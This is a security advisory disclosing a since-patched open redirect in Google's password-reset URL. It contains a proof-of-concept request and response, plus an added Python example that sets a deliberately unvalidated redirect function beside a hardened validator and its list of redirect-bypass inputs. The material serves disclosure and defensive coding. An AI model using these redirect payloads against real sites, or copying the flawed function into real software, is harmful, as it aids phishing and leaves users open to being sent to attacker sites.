Google.com Open Redirect

2011-11-09T00:00:00
ID PACKETSTORM:106755
Type packetstorm
Reporter Anastasios Monachos
Modified 2011-11-09T00:00:00

Description

=======================================================================  
Google.com - Open Redirect  
=======================================================================  
  
Affected Domain : Google.com  
Severity : Very Low  
Local/Remote : Remote  
Vulnerable URL : https://www.google.com/accounts/recovery/resetpassword?url=http://<any_domain>  
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]  
  
[Summary]  
  
Due to a parameter filtering bug, any value supplied in the url parameter is accepted without validation; as a result, the password-reset endpoint redirects the user to whatever that parameter contains, including an arbitrary external domain.  
  
  
[Vulnerability Details]  
  
GET Request:  
------------  
GET https://www.google.com/accounts/recovery/resetpassword?url=http://www.bbc.co.uk HTTP/1.1  
Host: www.google.com  
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Connection: keep-alive  
  
GET Response:  
-------------  
HTTP/1.1 302 Moved Temporarily  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Pragma: no-cache  
Expires: Fri, 01 Jan 1990 00:00:00 GMT  
Date: Wed, 26 Oct 2011 18:44:19 GMT  
Content-Type: text/html; charset=UTF-8  
Set-Cookie: mainpageaccountrecoveryparamscookie=; Expires=Wed, 02-Nov-2011 18:44:19 GMT; Path=/accounts/recovery; Secure; HttpOnly  
Location: http://www.bbc.co.uk  
X-Content-Type-Options: nosniff  
X-Frame-Options: SAMEORIGIN  
X-XSS-Protection: 1; mode=block  
Server: GSE  
  
<HTML>  
<HEAD>  
<TITLE>Moved Temporarily</TITLE>  
</HEAD>  
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">  
<H1>Moved Temporarily</H1>  
The document has moved <A HREF="http://www.bbc.co.uk">here</A>.  
</BODY>  
</HTML>  
  
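The following is an added example, not code from the advisory or from Google: it models the behaviour shown in the exchange above (the url parameter copied straight into the Location header) next to a hardened variant that only emits same-origin targets. The names TRUSTED_ORIGIN, DEFAULT_TARGET and both function names are assumptions for illustration; the hardened version also covers tricks the advisory does not mention, such as scheme-relative, userinfo and backslash forms.

```python
from urllib.parse import urlsplit, urlunsplit, urljoin

# Assumed values (not from the advisory): the origin the application is
# served from, and where to send the user when the url parameter is unusable.
TRUSTED_ORIGIN = "https://www.google.com"
DEFAULT_TARGET = "/accounts/recovery/done"
_TRUSTED_HOST = urlsplit(TRUSTED_ORIGIN).netloc.lower()


def vulnerable_redirect_target(url_param):
    """Deliberately mirrors the flaw in the advisory: the raw parameter
    value becomes the Location header with no validation at all."""
    return url_param or DEFAULT_TARGET


def safe_redirect_target(url_param):
    """Return a redirect target that always lands on TRUSTED_ORIGIN.

    Accepts either a path that starts with a single '/' or an absolute
    https URL whose host is exactly the trusted host. Everything else
    (foreign hosts, scheme-relative //host, javascript:, host@evil,
    backslashes, control characters) falls back to DEFAULT_TARGET.
    """
    if not url_param:
        return DEFAULT_TARGET
    candidate = url_param.strip()

    # Browsers treat '/\evil.example' like '//evil.example'; refuse rather
    # than try to normalise.
    if "\\" in candidate:
        return DEFAULT_TARGET
    # CR/LF or other control characters could split the Location header.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in candidate):
        return DEFAULT_TARGET

    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute (https://...), scheme-relative (//host) or scheme-only
        # (javascript:, https:/host) forms: allow only our exact origin.
        # Comparing the whole netloc also catches 'host@evil' and 'host:port'.
        if parts.scheme.lower() != "https" or parts.netloc.lower() != _TRUSTED_HOST:
            return DEFAULT_TARGET

    path = parts.path or "/"
    # A relative value must be an origin-rooted path; '//...' is excluded
    # because a browser would read it as a new authority.
    if not path.startswith("/") or path.startswith("//"):
        return DEFAULT_TARGET

    # Re-serialise from the parsed pieces and pin it to the trusted origin,
    # so the emitted Location cannot be reinterpreted differently by a client.
    relative = urlunsplit(("", "", path, parts.query, parts.fragment))
    return urljoin(TRUSTED_ORIGIN, relative)


def demo():
    """Run both variants over the advisory's payload and a few variants;
    returns {input: (vulnerable_result, hardened_result)}."""
    # Constructed inputs; the first is the exact value used in the advisory.
    samples = [
        "http://www.bbc.co.uk",
        "//www.bbc.co.uk",
        "/\\www.bbc.co.uk",
        "javascript:alert(1)",
        "https://www.google.com@www.bbc.co.uk/",
        "https://www.google.com.attacker.example/x",
        "/accounts/settings?hl=en",
        "https://www.google.com/accounts/settings?hl=en",
    ]
    return {s: (vulnerable_redirect_target(s), safe_redirect_target(s)) for s in samples}


if __name__ == "__main__":
    for value, (bad, good) in demo().items():
        print(f"{value!r:50} vulnerable -> {bad!r:45} hardened -> {good!r}")
```

Running the block prints, for each input, what the unvalidated handler would put in Location beside what the hardened one emits; only the two same-origin inputs survive, every other form collapses to DEFAULT_TARGET. The hardened function rejects rather than rewrites, which is the safer choice for a redirect parameter: if a value is not obviously one of ours, the user lands on a known page instead of wherever an attacker chose.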
  
[Time-line]  
  
25/10/2011 - Google notified  
26/10/2011 - Google responded  
02/11/2011 - Vendor patch released  
08/11/2011 - Public disclosure  